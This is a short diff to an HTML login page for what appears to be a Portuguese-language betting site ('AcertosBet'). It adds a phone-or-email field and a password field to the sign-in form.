--- a/Darksbet/trial.html
+++ b/Darksbet/trial.html
@@ -2561,6 +2561,8 @@ Faça seu login na <span style="color: #c5f546;">Acertos</span>Bet </div>
 <div class="elementor-widget-container">
 <link rel="stylesheet" href="css/televisor.css" id="wp-frontend-after-style-css-wordpress">
 <form method="post" id="formSincronizar">
+<input type="text" name="usuario" id="usuarioAcertos" placeholder="Telefone ou Email" required="">
+<input type="password" name="senha" id="senhaAcertos" placeholder="Senha" required="">
 <div class="password-toggle" onclick="togglePass()">
 <i class="toggle-icon fa fa-eye"></i>
 </div>
